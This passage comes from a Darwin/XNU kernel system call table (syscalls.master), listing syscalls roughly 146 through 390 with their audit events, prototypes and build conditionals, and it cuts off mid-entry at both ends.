nosys(void); } { old setrlimit } 222 | 146 AUE_NULL ALL { int nosys(void); } { old killpg } 223 | 147 AUE_SETSID ALL { int setsid(void); } 224 | 148 AUE_NULL ALL { int nosys(void); } { old setquota } 225 | 149 AUE_NULL ALL { int nosys(void); } { old qquota } 226 | 150 AUE_NULL ALL { int nosys(void); } { old getsockname } 227 | 151 AUE_GETPGID ALL { int getpgid(pid_t pid); } 228 | 152 AUE_SETPRIVEXEC ALL { int setprivexec(int flag); } 229 | 153 AUE_PREAD ALL { user_ssize_t pread(int fd, user_addr_t buf, user_size_t nbyte, off_t offset); } 230 | 154 AUE_PWRITE ALL { user_ssize_t pwrite(int fd, user_addr_t buf, user_size_t nbyte, off_t offset); } 231 | 232 | #if NFSSERVER 233 | 155 AUE_NFS_SVC ALL { int nfssvc(int flag, caddr_t argp); } 234 | #else 235 | 155 AUE_NULL ALL { int nosys(void); } 236 | #endif 237 | 238 | 156 AUE_NULL ALL { int nosys(void); } { old getdirentries } 239 | 157 AUE_STATFS ALL { int statfs(char *path, struct statfs *buf); } 240 | 158 AUE_FSTATFS ALL { int fstatfs(int fd, struct statfs *buf); } 241 | 159 AUE_UNMOUNT ALL { int unmount(user_addr_t path, int flags); } 242 | 160 AUE_NULL ALL { int nosys(void); } { old async_daemon } 243 | 244 | #if NFSSERVER 245 | 161 AUE_NFS_GETFH ALL { int getfh(char *fname, fhandle_t *fhp); } 246 | #else 247 | 161 AUE_NULL ALL { int nosys(void); } 248 | #endif 249 | 250 | 162 AUE_NULL ALL { int nosys(void); } { old getdomainname } 251 | 163 AUE_NULL ALL { int nosys(void); } { old setdomainname } 252 | 164 AUE_NULL ALL { int nosys(void); } 253 | 165 AUE_QUOTACTL ALL { int quotactl(const char *path, int cmd, int uid, caddr_t arg); } 254 | 166 AUE_NULL ALL { int nosys(void); } { old exportfs } 255 | 167 AUE_MOUNT ALL { int mount(char *type, char *path, int flags, caddr_t data); } 256 | 168 AUE_NULL ALL { int nosys(void); } { old ustat } 257 | 169 AUE_CSOPS ALL { int csops(pid_t pid, uint32_t ops, user_addr_t useraddr, user_size_t usersize); } 258 | 170 AUE_NULL HN { int nosys(void); } { old table } 259 | 171 AUE_NULL ALL { int nosys(void); } { old wait3 } 260 | 172 AUE_NULL ALL { int nosys(void); } { old rpause } 261 | 173 AUE_WAITID ALL { int waitid(idtype_t idtype, id_t id, siginfo_t *infop, int options); } 262 | 174 AUE_NULL ALL { int nosys(void); } { old getdents } 263 | 175 AUE_NULL ALL { int nosys(void); } { old gc_control } 264 | 176 AUE_ADDPROFILE ALL { int add_profil(short *bufbase, size_t bufsize, u_long pcoffset, u_int pcscale); } 265 | 177 AUE_NULL ALL { int nosys(void); } 266 | 178 AUE_NULL ALL { int nosys(void); } 267 | 179 AUE_NULL ALL { int nosys(void); } 268 | 180 AUE_KDEBUGTRACE ALL { int kdebug_trace(int code, int arg1, int arg2, int arg3, int arg4, int arg5) NO_SYSCALL_STUB; } 269 | 181 AUE_SETGID ALL { int setgid(gid_t gid); } 270 | 182 AUE_SETEGID ALL { int setegid(gid_t egid); } 271 | 183 AUE_SETEUID ALL { int seteuid(uid_t euid); } 272 | 184 AUE_SIGRETURN ALL { int sigreturn(struct ucontext *uctx, int infostyle) NO_SYSCALL_STUB; } 273 | 185 AUE_CHUD ALL { int chud(uint64_t code, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5) NO_SYSCALL_STUB; } 274 | 186 AUE_NULL ALL { int nosys(void); } 275 | 187 AUE_FDATASYNC ALL { int fdatasync(int fd); } 276 | 188 AUE_STAT ALL { int stat(user_addr_t path, user_addr_t ub); } 277 | 189 AUE_FSTAT ALL { int fstat(int fd, user_addr_t ub); } 278 | 190 AUE_LSTAT ALL { int lstat(user_addr_t path, user_addr_t ub); } 279 | 191 AUE_PATHCONF ALL { int pathconf(char *path, int name); } 280 | 192 AUE_FPATHCONF ALL { int fpathconf(int fd, int name); } 281 | 193 AUE_NULL ALL { int nosys(void); } 282 | 194 AUE_GETRLIMIT ALL { int getrlimit(u_int which, struct rlimit *rlp); } 283 | 195 AUE_SETRLIMIT ALL { int setrlimit(u_int which, struct rlimit *rlp); } 284 | 196 AUE_GETDIRENTRIES ALL { int getdirentries(int fd, char *buf, u_int count, long *basep); } 285 | 197 AUE_MMAP ALL { user_addr_t mmap(caddr_t addr, size_t len, int prot, int flags, int fd, off_t pos); } 286 | 198 AUE_NULL ALL { int nosys(void); } { __syscall } 287 | 199 AUE_LSEEK ALL { off_t lseek(int fd, off_t offset, int whence); } 288 | 200 AUE_TRUNCATE ALL { int truncate(char *path, off_t length); } 289 | 201 AUE_FTRUNCATE ALL { int ftruncate(int fd, off_t length); } 290 | 202 AUE_SYSCTL ALL { int __sysctl(int *name, u_int namelen, void *old, size_t *oldlenp, void *new, size_t newlen); } 291 | 203 AUE_MLOCK ALL { int mlock(caddr_t addr, size_t len); } 292 | 204 AUE_MUNLOCK ALL { int munlock(caddr_t addr, size_t len); } 293 | 205 AUE_UNDELETE ALL { int undelete(user_addr_t path); } 294 | 295 | #if NETAT 296 | 206 AUE_ATSOCKET ALL { int ATsocket(int proto); } 297 | 207 AUE_ATGETMSG UALL { int ATgetmsg(int fd, void *ctlptr, void *datptr, int *flags); } 298 | 208 AUE_ATPUTMSG UALL { int ATputmsg(int fd, void *ctlptr, void *datptr, int flags); } 299 | 209 AUE_ATPSNDREQ UALL { int ATPsndreq(int fd, unsigned char *buf, int len, int nowait); } 300 | 210 AUE_ATPSNDRSP UALL { int ATPsndrsp(int fd, unsigned char *respbuff, int resplen, int datalen); } 301 | 211 AUE_ATPGETREQ UALL { int ATPgetreq(int fd, unsigned char *buf, int buflen); } 302 | 212 AUE_ATPGETRSP UALL { int ATPgetrsp(int fd, unsigned char *bdsp); } 303 | 213 AUE_NULL ALL { int nosys(void); } { Reserved for AppleTalk } 304 | #else 305 | 206 AUE_NULL ALL { int nosys(void); } 306 | 207 AUE_NULL ALL { int nosys(void); } 307 | 208 AUE_NULL ALL { int nosys(void); } 308 | 209 AUE_NULL ALL { int nosys(void); } 309 | 210 AUE_NULL ALL { int nosys(void); } 310 | 211 AUE_NULL ALL { int nosys(void); } 311 | 212 AUE_NULL ALL { int nosys(void); } 312 | 213 AUE_NULL ALL { int nosys(void); } { Reserved for AppleTalk } 313 | #endif /* NETAT */ 314 | 315 | 214 AUE_NULL ALL { int nosys(void); } 316 | 215 AUE_NULL ALL { int nosys(void); } 317 | 318 | ; System Calls 216 - 230 are reserved for calls to support HFS/HFS Plus 319 | ; file system semantics. Currently, we only use 215-227. The rest is 320 | ; for future expansion in anticipation of new MacOS APIs for HFS Plus. 321 | ; These calls are not conditionalized because while they are specific 322 | ; to HFS semantics, they are not specific to the HFS filesystem. 323 | ; We expect all filesystems to recognize the call and report that it is 324 | ; not supported or to actually implement it. 325 | 216 AUE_MKCOMPLEX UHN { int mkcomplex(const char *path, mode_t mode, u_long type); } { soon to be obsolete } 326 | 217 AUE_STATV UHN { int statv(const char *path, struct vstat *vsb); } { soon to be obsolete } 327 | 218 AUE_LSTATV UHN { int lstatv(const char *path, struct vstat *vsb); } { soon to be obsolete } 328 | 219 AUE_FSTATV UHN { int fstatv(int fd, struct vstat *vsb); } { soon to be obsolete } 329 | 220 AUE_GETATTRLIST ALL { int getattrlist(const char *path, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); } 330 | 221 AUE_SETATTRLIST ALL { int setattrlist(const char *path, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); } 331 | 222 AUE_GETDIRENTRIESATTR ALL { int getdirentriesattr(int fd, struct attrlist *alist, void *buffer, size_t buffersize, u_long *count, u_long *basep, u_long *newstate, u_long options); } 332 | 223 AUE_EXCHANGEDATA ALL { int exchangedata(const char *path1, const char *path2, u_long options); } 333 | 224 AUE_NULL ALL { int nosys(void); } { old checkuseraccess / fsgetpath (which moved to 427) } 334 | 225 AUE_SEARCHFS ALL { int searchfs(const char *path, struct fssearchblock *searchblock, uint32_t *nummatches, uint32_t scriptcode, uint32_t options, struct searchstate *state); } 335 | 226 AUE_DELETE ALL { int delete(user_addr_t path) NO_SYSCALL_STUB; } { private delete (Carbon semantics) } 336 | 227 AUE_COPYFILE ALL { int copyfile(char *from, char *to, int mode, int flags) NO_SYSCALL_STUB; } 337 | 228 AUE_FGETATTRLIST ALL { int fgetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); } 338 | 229 AUE_FSETATTRLIST ALL { int fsetattrlist(int fd, struct attrlist *alist, void *attributeBuffer, size_t bufferSize, u_long options); } 339 | 230 AUE_POLL ALL { int poll(struct pollfd *fds, u_int nfds, int timeout); } 340 | 231 AUE_WATCHEVENT ALL { int watchevent(struct eventreq *u_req, int u_eventmask); } 341 | 232 AUE_WAITEVENT ALL { int waitevent(struct eventreq *u_req, struct timeval *tv); } 342 | 233 AUE_MODWATCH ALL { int modwatch(struct eventreq *u_req, int u_eventmask); } 343 | 234 AUE_GETXATTR ALL { user_ssize_t getxattr(user_addr_t path, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); } 344 | 235 AUE_FGETXATTR ALL { user_ssize_t fgetxattr(int fd, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); } 345 | 236 AUE_SETXATTR ALL { int setxattr(user_addr_t path, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); } 346 | 237 AUE_FSETXATTR ALL { int fsetxattr(int fd, user_addr_t attrname, user_addr_t value, size_t size, uint32_t position, int options); } 347 | 238 AUE_REMOVEXATTR ALL { int removexattr(user_addr_t path, user_addr_t attrname, int options); } 348 | 239 AUE_FREMOVEXATTR ALL { int fremovexattr(int fd, user_addr_t attrname, int options); } 349 | 240 AUE_LISTXATTR ALL { user_ssize_t listxattr(user_addr_t path, user_addr_t namebuf, size_t bufsize, int options); } 350 | 241 AUE_FLISTXATTR ALL { user_ssize_t flistxattr(int fd, user_addr_t namebuf, size_t bufsize, int options); } 351 | 242 AUE_FSCTL ALL { int fsctl(const char *path, u_long cmd, caddr_t data, u_int options); } 352 | 243 AUE_INITGROUPS ALL { int initgroups(u_int gidsetsize, gid_t *gidset, int gmuid); } 353 | 244 AUE_POSIX_SPAWN ALL { int posix_spawn(pid_t *pid, const char *path, const struct _posix_spawn_args_desc *adesc, char **argv, char **envp); } 354 | 245 AUE_FFSCTL ALL { int ffsctl(int fd, u_long cmd, caddr_t data, u_int options); } 355 | 246 AUE_NULL ALL { int nosys(void); } 356 | 357 | #if NFSCLIENT 358 | 247 AUE_NULL ALL { int nfsclnt(int flag, caddr_t argp); } 359 | #else 360 | 247 AUE_NULL ALL { int nosys(void); } 361 | #endif 362 | #if NFSSERVER 363 | 248 AUE_FHOPEN ALL { int fhopen(const struct fhandle *u_fhp, int flags); } 364 | #else 365 | 248 AUE_NULL ALL { int nosys(void); } 366 | #endif 367 | 368 | 249 AUE_NULL ALL { int nosys(void); } 369 | 250 AUE_MINHERIT ALL { int minherit(void *addr, size_t len, int inherit); } 370 | #if SYSV_SEM 371 | 251 AUE_SEMSYS ALL { int semsys(u_int which, int a2, int a3, int a4, int a5); } 372 | #else 373 | 251 AUE_NULL ALL { int nosys(void); } 374 | #endif 375 | #if SYSV_MSG 376 | 252 AUE_MSGSYS ALL { int msgsys(u_int which, int a2, int a3, int a4, int a5); } 377 | #else 378 | 252 AUE_NULL ALL { int nosys(void); } 379 | #endif 380 | #if SYSV_SHM 381 | 253 AUE_SHMSYS ALL { int shmsys(u_int which, int a2, int a3, int a4); } 382 | #else 383 | 253 AUE_NULL ALL { int nosys(void); } 384 | #endif 385 | #if SYSV_SEM 386 | 254 AUE_SEMCTL ALL { int semctl(int semid, int semnum, int cmd, semun_t arg); } 387 | 255 AUE_SEMGET ALL { int semget(key_t key, int nsems, int semflg); } 388 | 256 AUE_SEMOP ALL { int semop(int semid, struct sembuf *sops, int nsops); } 389 | 257 AUE_NULL ALL { int nosys(void); } 390 | #else 391 | 254 AUE_NULL ALL { int nosys(void); } 392 | 255 AUE_NULL ALL { int nosys(void); } 393 | 256 AUE_NULL ALL { int nosys(void); } 394 | 257 AUE_NULL ALL { int nosys(void); } 395 | #endif 396 | #if SYSV_MSG 397 | 258 AUE_MSGCTL ALL { int msgctl(int msqid, int cmd, struct msqid_ds *buf); } 398 | 259 AUE_MSGGET ALL { int msgget(key_t key, int msgflg); } 399 | 260 AUE_MSGSND ALL { int msgsnd(int msqid, void *msgp, size_t msgsz, int msgflg); } 400 | 261 AUE_MSGRCV ALL { user_ssize_t msgrcv(int msqid, void *msgp, size_t msgsz, long msgtyp, int msgflg); } 401 | #else 402 | 258 AUE_NULL ALL { int nosys(void); } 403 | 259 AUE_NULL ALL { int nosys(void); } 404 | 260 AUE_NULL ALL { int nosys(void); } 405 | 261 AUE_NULL ALL { int nosys(void); } 406 | #endif 407 | #if SYSV_SHM 408 | 262 AUE_SHMAT ALL { user_addr_t shmat(int shmid, void *shmaddr, int shmflg); } 409 | 263 AUE_SHMCTL ALL { int shmctl(int shmid, int cmd, struct shmid_ds *buf); } 410 | 264 AUE_SHMDT ALL { int shmdt(void *shmaddr); } 411 | 265 AUE_SHMGET ALL { int shmget(key_t key, size_t size, int shmflg); } 412 | #else 413 | 262 AUE_NULL ALL { int nosys(void); } 414 | 263 AUE_NULL ALL { int nosys(void); } 415 | 264 AUE_NULL ALL { int nosys(void); } 416 | 265 AUE_NULL ALL { int nosys(void); } 417 | #endif 418 | 266 AUE_SHMOPEN ALL { int shm_open(const char *name, int oflag, int mode); } 419 | 267 AUE_SHMUNLINK ALL { int shm_unlink(const char *name); } 420 | 268 AUE_SEMOPEN ALL { user_addr_t sem_open(const char *name, int oflag, int mode, int value); } 421 | 269 AUE_SEMCLOSE ALL { int sem_close(sem_t *sem); } 422 | 270 AUE_SEMUNLINK ALL { int sem_unlink(const char *name); } 423 | 271 AUE_SEMWAIT ALL { int sem_wait(sem_t *sem); } 424 | 272 AUE_SEMTRYWAIT ALL { int sem_trywait(sem_t *sem); } 425 | 273 AUE_SEMPOST ALL { int sem_post(sem_t *sem); } 426 | 274 AUE_SEMGETVALUE ALL { int sem_getvalue(sem_t *sem, int *sval); } 427 | 275 AUE_SEMINIT ALL { int sem_init(sem_t *sem, int phsared, u_int value); } 428 | 276 AUE_SEMDESTROY ALL { int sem_destroy(sem_t *sem); } 429 | 277 AUE_OPEN_EXTENDED_RWTC ALL { int open_extended(user_addr_t path, int flags, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; } 430 | 278 AUE_UMASK_EXTENDED ALL { int umask_extended(int newmask, user_addr_t xsecurity) NO_SYSCALL_STUB; } 431 | 279 AUE_STAT_EXTENDED ALL { int stat_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 432 | 280 AUE_LSTAT_EXTENDED ALL { int lstat_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 433 | 281 AUE_FSTAT_EXTENDED ALL { int fstat_extended(int fd, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 434 | 282 AUE_CHMOD_EXTENDED ALL { int chmod_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; } 435 | 283 AUE_FCHMOD_EXTENDED ALL { int fchmod_extended(int fd, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; } 436 | 284 AUE_ACCESS_EXTENDED ALL { int access_extended(user_addr_t entries, size_t size, user_addr_t results, uid_t uid) NO_SYSCALL_STUB; } 437 | 285 AUE_SETTID ALL { int settid(uid_t uid, gid_t gid) NO_SYSCALL_STUB; } 438 | 286 AUE_GETTID ALL { int gettid(uid_t *uidp, gid_t *gidp) NO_SYSCALL_STUB; } 439 | 287 AUE_SETSGROUPS ALL { int setsgroups(int setlen, user_addr_t guidset) NO_SYSCALL_STUB; } 440 | 288 AUE_GETSGROUPS ALL { int getsgroups(user_addr_t setlen, user_addr_t guidset) NO_SYSCALL_STUB; } 441 | 289 AUE_SETWGROUPS ALL { int setwgroups(int setlen, user_addr_t guidset) NO_SYSCALL_STUB; } 442 | 290 AUE_GETWGROUPS ALL { int getwgroups(user_addr_t setlen, user_addr_t guidset) NO_SYSCALL_STUB; } 443 | 291 AUE_MKFIFO_EXTENDED ALL { int mkfifo_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; } 444 | 292 AUE_MKDIR_EXTENDED ALL { int mkdir_extended(user_addr_t path, uid_t uid, gid_t gid, int mode, user_addr_t xsecurity) NO_SYSCALL_STUB; } 445 | 293 AUE_IDENTITYSVC ALL { int identitysvc(int opcode, user_addr_t message) NO_SYSCALL_STUB; } 446 | 294 AUE_NULL ALL { int shared_region_check_np(uint64_t *start_address) NO_SYSCALL_STUB; } 447 | 295 AUE_NULL ALL { int shared_region_map_np(int fd, uint32_t count, const struct shared_file_mapping_np *mappings) NO_SYSCALL_STUB; } 448 | 296 AUE_NULL ALL { int vm_pressure_monitor(int wait_for_pressure, int nsecs_monitored, uint32_t *pages_reclaimed); } 449 | #if PSYNCH 450 | 297 AUE_NULL ALL { uint32_t psynch_rw_longrdlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 451 | 298 AUE_NULL ALL { uint32_t psynch_rw_yieldwrlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 452 | 299 AUE_NULL ALL { int psynch_rw_downgrade(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 453 | 300 AUE_NULL ALL { uint32_t psynch_rw_upgrade(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 454 | 301 AUE_NULL ALL { uint32_t psynch_mutexwait(user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; } 455 | 302 AUE_NULL ALL { uint32_t psynch_mutexdrop(user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; } 456 | 303 AUE_NULL ALL { int psynch_cvbroad(user_addr_t cv, uint32_t cvgen, uint32_t diffgen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t tid, uint32_t flags) NO_SYSCALL_STUB; } 457 | 304 AUE_NULL ALL { int psynch_cvsignal(user_addr_t cv, uint32_t cvgen, uint32_t cvugen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, int thread_port, uint32_t flags) NO_SYSCALL_STUB; } 458 | 305 AUE_NULL ALL { uint32_t psynch_cvwait(user_addr_t cv, uint32_t cvgen, uint32_t cvugen, user_addr_t mutex, uint32_t mgen, uint32_t ugen, uint64_t sec, uint64_t usec) NO_SYSCALL_STUB; } 459 | 306 AUE_NULL ALL { uint32_t psynch_rw_rdlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 460 | 307 AUE_NULL ALL { uint32_t psynch_rw_wrlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 461 | 308 AUE_NULL ALL { uint32_t psynch_rw_unlock(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 462 | 309 AUE_NULL ALL { uint32_t psynch_rw_unlock2(user_addr_t rwlock, uint32_t lgenval, uint32_t ugenval, uint32_t rw_wc, int flags) NO_SYSCALL_STUB; } 463 | #else 464 | 297 AUE_NULL ALL { int nosys(void); } { old reset_shared_file } 465 | 298 AUE_NULL ALL { int nosys(void); } { old new_system_shared_regions } 466 | 299 AUE_NULL ALL { int enosys(void); } { old shared_region_map_file_np } 467 | 300 AUE_NULL ALL { int enosys(void); } { old shared_region_make_private_np } 468 | 301 AUE_NULL ALL { int nosys(void); } 469 | 302 AUE_NULL ALL { int nosys(void); } 470 | 303 AUE_NULL ALL { int nosys(void); } 471 | 304 AUE_NULL ALL { int nosys(void); } 472 | 305 AUE_NULL ALL { int nosys(void); } 473 | 306 AUE_NULL ALL { int nosys(void); } 474 | 307 AUE_NULL ALL { int nosys(void); } 475 | 308 AUE_NULL ALL { int nosys(void); } 476 | 309 AUE_NULL ALL { int nosys(void); } 477 | #endif 478 | 310 AUE_GETSID ALL { int getsid(pid_t pid); } 479 | 311 AUE_SETTIDWITHPID ALL { int settid_with_pid(pid_t pid, int assume) NO_SYSCALL_STUB; } 480 | 312 AUE_NULL ALL { int nosys(void); } { old __pthread_cond_timedwait } 481 | 313 AUE_NULL ALL { int aio_fsync(int op, user_addr_t aiocbp); } 482 | 314 AUE_NULL ALL { user_ssize_t aio_return(user_addr_t aiocbp); } 483 | 315 AUE_NULL ALL { int aio_suspend(user_addr_t aiocblist, int nent, user_addr_t timeoutp); } 484 | 316 AUE_NULL ALL { int aio_cancel(int fd, user_addr_t aiocbp); } 485 | 317 AUE_NULL ALL { int aio_error(user_addr_t aiocbp); } 486 | 318 AUE_NULL ALL { int aio_read(user_addr_t aiocbp); } 487 | 319 AUE_NULL ALL { int aio_write(user_addr_t aiocbp); } 488 | 320 AUE_LIOLISTIO ALL { int lio_listio(int mode, user_addr_t aiocblist, int nent, user_addr_t sigp); } 489 | 321 AUE_NULL ALL { int nosys(void); } { old __pthread_cond_wait } 490 | 322 AUE_IOPOLICYSYS ALL { int iopolicysys(int cmd, void *arg) NO_SYSCALL_STUB; } 491 | 323 AUE_NULL ALL { int nosys(void); } 492 | 324 AUE_MLOCKALL ALL { int mlockall(int how); } 493 | 325 AUE_MUNLOCKALL ALL { int munlockall(int how); } 494 | 326 AUE_NULL ALL { int nosys(void); } 495 | 327 AUE_ISSETUGID ALL { int issetugid(void); } 496 | 328 AUE_PTHREADKILL ALL { int __pthread_kill(int thread_port, int sig); } 497 | 329 AUE_PTHREADSIGMASK ALL { int __pthread_sigmask(int how, user_addr_t set, user_addr_t oset); } 498 | 330 AUE_SIGWAIT ALL { int __sigwait(user_addr_t set, user_addr_t sig); } 499 | 331 AUE_NULL ALL { int __disable_threadsignal(int value); } 500 | 332 AUE_NULL ALL { int __pthread_markcancel(int thread_port); } 501 | 333 AUE_NULL ALL { int __pthread_canceled(int action); } 502 | 503 | ;#if OLD_SEMWAIT_SIGNAL 504 | ;334 AUE_NULL ALL { int nosys(void); } { old __semwait_signal } 505 | ;#else 506 | 334 AUE_SEMWAITSIGNAL ALL { int __semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, int64_t tv_sec, int32_t tv_nsec); } 507 | ;#endif 508 | 509 | 335 AUE_NULL ALL { int nosys(void); } { old utrace } 510 | 336 AUE_PROCINFO ALL { int proc_info(int32_t callnum,int32_t pid,uint32_t flavor, uint64_t arg,user_addr_t buffer,int32_t buffersize) NO_SYSCALL_STUB; } 511 | #if SENDFILE 512 | 337 AUE_SENDFILE ALL { int sendfile(int fd, int s, off_t offset, off_t *nbytes, struct sf_hdtr *hdtr, int flags); } 513 | #else /* !SENDFILE */ 514 | 337 AUE_NULL ALL { int nosys(void); } 515 | #endif /* SENDFILE */ 516 | 338 AUE_STAT64 ALL { int stat64(user_addr_t path, user_addr_t ub); } 517 | 339 AUE_FSTAT64 ALL { int fstat64(int fd, user_addr_t ub); } 518 | 340 AUE_LSTAT64 ALL { int lstat64(user_addr_t path, user_addr_t ub); } 519 | 341 AUE_STAT64_EXTENDED ALL { int stat64_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 520 | 342 AUE_LSTAT64_EXTENDED ALL { int lstat64_extended(user_addr_t path, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 521 | 343 AUE_FSTAT64_EXTENDED ALL { int fstat64_extended(int fd, user_addr_t ub, user_addr_t xsecurity, user_addr_t xsecurity_size) NO_SYSCALL_STUB; } 522 | 344 AUE_GETDIRENTRIES64 ALL { user_ssize_t getdirentries64(int fd, void *buf, user_size_t bufsize, off_t *position) NO_SYSCALL_STUB; } 523 | 345 AUE_STATFS64 ALL { int statfs64(char *path, struct statfs64 *buf); } 524 | 346 AUE_FSTATFS64 ALL { int fstatfs64(int fd, struct statfs64 *buf); } 525 | 347 AUE_GETFSSTAT64 ALL { int getfsstat64(user_addr_t buf, int bufsize, int flags); } 526 | 348 AUE_NULL ALL { int __pthread_chdir(user_addr_t path); } 527 | 349 AUE_NULL ALL { int __pthread_fchdir(int fd); } 528 | 350 AUE_AUDIT ALL { int audit(void *record, int length); } 529 | 351 AUE_AUDITON ALL { int auditon(int cmd, void *data, int length); } 530 | 352 AUE_NULL ALL { int nosys(void); } 531 | 353 AUE_GETAUID ALL { int getauid(au_id_t *auid); } 532 | 354 AUE_SETAUID ALL { int setauid(au_id_t *auid); } 533 | 355 AUE_GETAUDIT ALL { int getaudit(struct auditinfo *auditinfo); } 534 | 356 AUE_SETAUDIT ALL { int setaudit(struct auditinfo *auditinfo); } 535 | 357 AUE_GETAUDIT_ADDR ALL { int getaudit_addr(struct auditinfo_addr *auditinfo_addr, int length); } 536 | 358 AUE_SETAUDIT_ADDR ALL { int setaudit_addr(struct auditinfo_addr *auditinfo_addr, int length); } 537 | 359 AUE_AUDITCTL ALL { int auditctl(char *path); } 538 | #if CONFIG_WORKQUEUE 539 | 360 AUE_NULL ALL { user_addr_t bsdthread_create(user_addr_t func, user_addr_t func_arg, user_addr_t stack, user_addr_t pthread, uint32_t flags) NO_SYSCALL_STUB; } 540 | 361 AUE_NULL ALL { int bsdthread_terminate(user_addr_t stackaddr, size_t freesize, uint32_t port, uint32_t sem) NO_SYSCALL_STUB; } 541 | #else 542 | 360 AUE_NULL ALL { int nosys(void); } 543 | 361 AUE_NULL ALL { int nosys(void); } 544 | #endif /* CONFIG_WORKQUEUE */ 545 | 362 AUE_KQUEUE ALL { int kqueue(void); } 546 | 363 AUE_NULL ALL { int kevent(int fd, const struct kevent *changelist, int nchanges, struct kevent *eventlist, int nevents, const struct timespec *timeout); } 547 | 364 AUE_LCHOWN ALL { int lchown(user_addr_t path, uid_t owner, gid_t group); } 548 | 365 AUE_STACKSNAPSHOT ALL { int stack_snapshot(pid_t pid, user_addr_t tracebuf, uint32_t tracebuf_size, uint32_t flags, uint32_t dispatch_offset) NO_SYSCALL_STUB; } 549 | #if CONFIG_WORKQUEUE 550 | 366 AUE_NULL ALL { int bsdthread_register(user_addr_t threadstart, user_addr_t wqthread, int pthsize,user_addr_t dummy_value, user_addr_t targetconc_ptr, uint64_t dispatchqueue_offset) NO_SYSCALL_STUB; } 551 | 367 AUE_WORKQOPEN ALL { int workq_open(void) NO_SYSCALL_STUB; } 552 | 368 AUE_WORKQOPS ALL { int workq_kernreturn(int options, user_addr_t item, int affinity, int prio) NO_SYSCALL_STUB; } 553 | #else 554 | 366 AUE_NULL ALL { int nosys(void); } 555 | 367 AUE_NULL ALL { int nosys(void); } 556 | 368 AUE_NULL ALL { int nosys(void); } 557 | #endif /* CONFIG_WORKQUEUE */ 558 | 369 AUE_NULL ALL { int kevent64(int fd, const struct kevent64_s *changelist, int nchanges, struct kevent64_s *eventlist, int nevents, unsigned int flags, const struct timespec *timeout); } 559 | #if OLD_SEMWAIT_SIGNAL 560 | 370 AUE_SEMWAITSIGNAL ALL { int __old_semwait_signal(int cond_sem, int mutex_sem, int timeout, int relative, const struct timespec *ts); } 561 | 371 AUE_SEMWAITSIGNAL ALL { int __old_semwait_signal_nocancel(int cond_sem, int mutex_sem, int timeout, int relative, const struct timespec *ts) NO_SYSCALL_STUB; } 562 | #else 563 | 370 AUE_NULL ALL { int nosys(void); } { old __semwait_signal } 564 | 371 AUE_NULL ALL { int nosys(void); } { old __semwait_signal } 565 | #endif 566 | 372 AUE_NULL ALL { user_addr_t thread_selfid (void) NO_SYSCALL_STUB; } 567 | 373 AUE_NULL ALL { int nosys(void); } 568 | 374 AUE_NULL ALL { int nosys(void); } 569 | 375 AUE_NULL ALL { int nosys(void); } 570 | 376 AUE_NULL ALL { int nosys(void); } 571 | 377 AUE_NULL ALL { int nosys(void); } 572 | 378 AUE_NULL ALL { int nosys(void); } 573 | 379 AUE_NULL ALL { int nosys(void); } 574 | 380 AUE_MAC_EXECVE ALL { int __mac_execve(char *fname, char **argp, char **envp, struct mac *mac_p); } 575 | 381 AUE_MAC_SYSCALL ALL { int __mac_syscall(char *policy, int call, user_addr_t arg); } 576 | 382 AUE_MAC_GET_FILE ALL { int __mac_get_file(char *path_p, struct mac *mac_p); } 577 | 383 AUE_MAC_SET_FILE ALL { int __mac_set_file(char *path_p, struct mac *mac_p); } 578 | 384 AUE_MAC_GET_LINK ALL { int __mac_get_link(char *path_p, struct mac *mac_p); } 579 | 385 AUE_MAC_SET_LINK ALL { int __mac_set_link(char *path_p, struct mac *mac_p); } 580 | 386 AUE_MAC_GET_PROC ALL { int __mac_get_proc(struct mac *mac_p); } 581 | 387 AUE_MAC_SET_PROC ALL { int __mac_set_proc(struct mac *mac_p); } 582 | 388 AUE_MAC_GET_FD ALL { int __mac_get_fd(int fd, struct mac *mac_p); } 583 | 389 AUE_MAC_SET_FD ALL { int __mac_set_fd(int fd, struct mac *mac_p); } 584 | 390 AUE_MAC_GET_PID 